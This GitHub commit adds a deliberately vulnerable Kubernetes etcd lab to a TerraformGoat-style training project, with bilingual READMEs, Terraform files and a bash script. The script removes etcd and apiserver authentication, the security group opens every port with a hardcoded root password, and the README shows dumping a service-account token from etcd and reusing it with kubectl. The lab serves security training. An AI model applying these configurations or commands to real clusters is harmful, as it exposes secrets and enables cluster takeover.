-
Notifications
You must be signed in to change notification settings - Fork 78
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #86 from leveryd/main
feat: add kubernets etcd unauth scenario
- Loading branch information
Showing
8 changed files
with
312 additions
and
0 deletions.
There are no files selected for viewing
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# kubernetes etcd unauth Vulnerable Environment | ||
|
||
English | [中文](./README_CN.md) | ||
|
||
## Description | ||
|
||
This is a scenario used to build the kubernetes etcd unauth vulnerability environment. | ||
|
||
After building the environment with Terraform, users can obtain api object resource on kubernetes cluster through the etcd unauth vulnerabilities. | ||
|
||
## Deployment Environment | ||
|
||
Execute the following command in the container | ||
|
||
```shell | ||
cd /TerraformGoat/kubernets/etcd/unauth | ||
``` | ||
|
||
Configure Alibaba Cloud Access Credentials | ||
|
||
```shell | ||
export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX" | ||
export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX" | ||
export ALICLOUD_REGION="cn-beijing" | ||
``` | ||
|
||
> You can create and view your AccessKey on the [AccessKey page](https://ram.console.aliyun.com/manage/ak) of the Alibaba Cloud console | ||
Deploy Vulnerable Environment | ||
|
||
```shell | ||
terraform init | ||
terraform apply | ||
``` | ||
|
||
> When the terminal prompts `Enter a value:`, enter `yes` | ||
![img](../../../images/20220622-174141.jpg) | ||
|
||
After the environment is set up, You can see the etcd access address of the scenario at Outputs. | ||
|
||
## Vulnerability Utilization | ||
|
||
we can use "etcdctl" tool to read secrets on kubernets cluster. | ||
|
||
for example, get "deployment controller" token | ||
|
||
```shell | ||
➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get / --prefix --keys-only|grep secrets | ||
... | ||
/registry/secrets/kube-system/deployment-controller-token-klbtj | ||
... | ||
➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get /registry/secrets/kube-system/deployment-controller-token-klbtj | ||
... | ||
token�eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA#kubernetes.io/service-account-token | ||
``` | ||
|
||
then use "deployment controller" token to access kube-apiserver, such as query pod resources | ||
|
||
```shell | ||
➜ unauth git:(main) ✗ kubectl --insecure-skip-tls-verify=true --server="https://39.96.163.182:6443" --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0 | ||
GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA" get pods -A | ||
|
||
NAMESPACE NAME READY STATUS RESTARTS AGE | ||
kube-system coredns-5495dd7c88-kb7vh 0/1 Pending 0 18m | ||
kube-system coredns-5495dd7c88-lwkpr 0/1 Pending 0 18m | ||
kube-system kube-apiserver-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 0 17m | ||
kube-system kube-controller-manager-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m | ||
kube-system kube-proxy-pgrtj 1/1 Running 0 18m | ||
kube-system kube-scheduler-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m | ||
``` | ||
|
||
## Destroy the environment | ||
|
||
```shell | ||
terraform destroy | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# kubernetes etcd 漏洞环境 | ||
|
||
[English](./README.md) | 中文 | ||
|
||
## 描述信息 | ||
|
||
这是一个用于构建kubernetes etcd组件 未授权访问漏洞环境的靶场。 | ||
|
||
使用 terraform 构建环境后,用户可以通过 etcd组件 未授权访问漏洞获取到 kubernetes中的api资源信息。 | ||
|
||
## 环境搭建 | ||
|
||
在容器中执行以下命令 | ||
|
||
```shell | ||
cd /TerraformGoat/kubernets/etcd/unauth | ||
``` | ||
|
||
配置阿里云访问凭证 | ||
|
||
```shell | ||
export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX" | ||
export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX" | ||
export ALICLOUD_REGION="cn-beijing" | ||
``` | ||
|
||
> 在阿里云控制台的 [AccessKey 页面](https://ram.console.aliyun.com/manage/ak) 可以创建和查看您的 AccessKey | ||
部署靶场 | ||
|
||
```shell | ||
terraform init | ||
terraform apply | ||
``` | ||
|
||
> 在终端提示 `Enter a value:` 时,输入 `yes` 即可 | ||
![img](../../../images/20220622-174141.jpg) | ||
|
||
环境搭建完后,在 Outputs 处可以看到etcd的访问地址。 | ||
|
||
## 漏洞利用 | ||
|
||
在存在 未授权访问 漏洞的 etcd 上,我们可以利用 etcdctl工具 读取 kubernetes集群 的secrets数据。 | ||
|
||
读取secrets数据,获取部署控制器token | ||
|
||
```shell | ||
➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get / --prefix --keys-only|grep secrets | ||
... | ||
/registry/secrets/kube-system/deployment-controller-token-klbtj | ||
... | ||
➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get /registry/secrets/kube-system/deployment-controller-token-klbtj | ||
... | ||
token�eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA#kubernetes.io/service-account-token | ||
``` | ||
|
||
利用token访问访问kube-apiserver,比如查询pod | ||
|
||
```shell | ||
➜ unauth git:(main) ✗ kubectl --insecure-skip-tls-verify=true --server="https://39.96.163.182:6443" --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0 | ||
GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA" get pods -A | ||
|
||
NAMESPACE NAME READY STATUS RESTARTS AGE | ||
kube-system coredns-5495dd7c88-kb7vh 0/1 Pending 0 18m | ||
kube-system coredns-5495dd7c88-lwkpr 0/1 Pending 0 18m | ||
kube-system kube-apiserver-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 0 17m | ||
kube-system kube-controller-manager-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m | ||
kube-system kube-proxy-pgrtj 1/1 Running 0 18m | ||
kube-system kube-scheduler-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m | ||
``` | ||
|
||
## 销毁环境 | ||
|
||
```shell | ||
terraform destroy | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,82 @@ | ||
resource "alicloud_instance" "instance" { | ||
security_groups = alicloud_security_group.group.*.id | ||
instance_type = data.alicloud_instance_types.types_ds.instance_types.0.id | ||
image_id = "ubuntu_18_04_64_20G_alibase_20190624.vhd" | ||
instance_name = "huocorp_terraform_goat_instance" | ||
vswitch_id = alicloud_vswitch.vswitch.id | ||
system_disk_size = 20 | ||
internet_max_bandwidth_out = 100 | ||
password = "Huoxian@123" // 虚拟机密码 | ||
|
||
provisioner "file" { | ||
connection { | ||
type = "ssh" | ||
host = self.public_ip | ||
user = "root" | ||
password = "Huoxian@123" | ||
timeout = "1h" | ||
} | ||
|
||
source = "resource/kk" | ||
destination = "/root/kk" // deploy_k8s.sh用来安装k8s | ||
} | ||
|
||
provisioner "remote-exec" { | ||
connection { | ||
type = "ssh" | ||
host = self.public_ip | ||
user = "root" | ||
password = "Huoxian@123" | ||
timeout = "1h" | ||
} | ||
script = "resource/deploy_k8s.sh" | ||
} | ||
|
||
depends_on = [ | ||
alicloud_security_group.group, | ||
alicloud_vswitch.vswitch, | ||
] | ||
} | ||
|
||
resource "alicloud_security_group" "group" { | ||
name = "huocorp_terraform_goat_security_group" | ||
vpc_id = alicloud_vpc.vpc.id | ||
depends_on = [ | ||
alicloud_vpc.vpc | ||
] | ||
} | ||
|
||
resource "alicloud_security_group_rule" "allow_all_tcp" { | ||
type = "ingress" | ||
ip_protocol = "tcp" | ||
nic_type = "intranet" | ||
policy = "accept" | ||
port_range = "1/65535" // 允许访问所有端口 | ||
priority = 1 | ||
security_group_id = alicloud_security_group.group.id | ||
cidr_ip = "0.0.0.0/0" | ||
depends_on = [ | ||
alicloud_security_group.group | ||
] | ||
} | ||
|
||
resource "alicloud_vpc" "vpc" { | ||
vpc_name = "huocorp_terraform_goat_vpc" | ||
cidr_block = "172.16.0.0/16" | ||
} | ||
|
||
resource "alicloud_vswitch" "vswitch" { | ||
vpc_id = alicloud_vpc.vpc.id | ||
cidr_block = "172.16.0.0/24" | ||
zone_id = "cn-beijing-h" | ||
vswitch_name = "huocorp_terraform_goat_vswitch" | ||
depends_on = [ | ||
alicloud_vpc.vpc | ||
] | ||
} | ||
|
||
// kubekey安装k8s集群,配置要求至少 2核4g | ||
data "alicloud_instance_types" "types_ds" { | ||
cpu_core_count = 2 | ||
memory_size = 4 | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
output "etcd_unauth_lab_address_link" { | ||
value = "http://${alicloud_instance.instance.public_ip}:2379" | ||
description = "etcd un-auth lab address link." | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
#!/bin/bash | ||
function deploy_k8s(){ | ||
export KKZONE=cn | ||
|
||
# /root/kk 已经通过terrraform provisioner拷贝主机 | ||
chmod 755 /root/kk | ||
|
||
apt-get update -y | ||
apt-get install -y conntrack ebtables socat | ||
|
||
/root/kk create cluster --with-kubernetes v1.21.5 -y | ||
} | ||
|
||
# etcd没有任何身份认证 | ||
function deploy_vuln_etcd1(){ | ||
# 备份 | ||
apiserver_config_path=/etc/kubernetes/manifests/kube-apiserver.yaml | ||
etcd_config_path=/etc/etcd.env | ||
command_path=/usr/local/bin/etcd | ||
|
||
cp $apiserver_config_path /root/kube-apiserver.yaml | ||
cp $etcd_config_path /root/etcd.env | ||
|
||
# 删除tls配置 | ||
sed -i '/ETCD_TRUSTED_CA_FILE/d' $etcd_config_path | ||
sed -i '/ETCD_CERT_FILE/d' $etcd_config_path | ||
sed -i '/ETCD_KEY_FILE/d' $etcd_config_path | ||
sed -i '/ETCD_CLIENT_CERT_AUTH/d' $etcd_config_path | ||
|
||
# 修改https到http | ||
# 执行两次,因为 ETCD_LISTEN_CLIENT_URLS=https://172.31.14.33:2379,https://127.0.0.1:2379 | ||
sed -i 's/\(.*\)https:\(.*\):2379/\1http:\2:2379/' $etcd_config_path | ||
sed -i 's/\(.*\)https:\(.*\):2379/\1http:\2:2379/' $etcd_config_path | ||
|
||
echo "[done] '$etcd_config_path' change" | ||
|
||
# 重新启动etcd进程 | ||
export $(cat $etcd_config_path | grep -v '#' | xargs) | ||
|
||
# echo "$command_path" | ||
pkill -f "$command_path" | ||
sleep 1 | ||
ps aux| grep "$command_path" | ||
setsid $command_path & | ||
|
||
echo "[done] 'etcd' restart" | ||
|
||
# 修改配置,重新启动apiserver进程 | ||
sed -i '/--etcd-cafile/d' $apiserver_config_path | ||
sed -i '/--etcd-certfile/d' $apiserver_config_path | ||
sed -i '/--etcd-keyfile/d' $apiserver_config_path | ||
sed -i 's/\(.*\)--etcd-servers=https:\(.*\):2379/\1--etcd-servers=http:\2:2379/' $apiserver_config_path | ||
|
||
echo "[done] '$apiserver_config_path' change" | ||
} | ||
|
||
deploy_k8s | ||
echo "[done] 'k8s cluster' deploy" && sleep 60 | ||
deploy_vuln_etcd1 |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
terraform { | ||
required_providers { | ||
alicloud = { | ||
source = "aliyun/alicloud" | ||
version = "1.163.0" | ||
} | ||
} | ||
} | ||
|
||
provider "alicloud" { | ||
profile = "default" | ||
region = "cn-beijing" | ||
} |